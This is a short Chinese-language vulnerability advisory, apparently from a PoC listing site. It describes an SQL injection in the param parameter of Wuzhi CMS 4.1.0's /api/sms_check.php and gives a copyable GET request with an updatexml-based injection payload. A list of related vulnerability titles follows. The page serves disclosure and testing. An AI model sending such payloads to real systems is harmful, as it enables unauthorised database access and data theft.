漏洞描述 【漏洞对象】五指CMS系统 【涉及版本】4.1.0 【漏洞描述】五指CMS系统的/api/sms_check.php文件param参数存在sql注入,可造成信息数据泄露,攻击者可利用该漏洞执行SQL指令,甚至入侵服务器。
PoC代码 复制 GET /api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20md5(999999999)),0x7e),1)--%20 HTTP/1.1
相关漏洞推荐 POC 智互联WMS getsyspdaversionlistbyparams SQL注入漏洞 ESAFENET CDG /CDGServer3/parameter/HookService;logindojojs SQL 注入漏洞 (CVE-2024-10660) POC qiyuesuo-template-param-edits-rce: 契约锁电子签章平台edits远程代码执行漏洞 POC parameters-config: Parameters.yml - File Discovery POC top-xss-params: Top 38 Parameters - Cross-Site Scripting Modoboa /api/v2/parameters/core/ 未授权访问漏洞 (CVE-2023-2227) 公交IC卡收单管理系统bus、line、parametercard、role、user等位置存在SQL注入漏洞 契约锁电子签章平台param/edits存在任意命令执行漏洞 飞鱼星企业级智能上网行为管理系统 /send_order.cgi?parameter=operation 命令执行漏洞 WordPress LearnPress Plugin handle_params_for_query_courses SQL注入漏洞 契约锁-电子签章系统 /template/param/edits 接口存在远程代码执行 Powertek Firmware 小于3.30.30版本get_param.cgi处存在认证绕过(CVE-2022-33174) strongsoft灾害预警系统doDbAccess.ashx页面params参数-SQL注入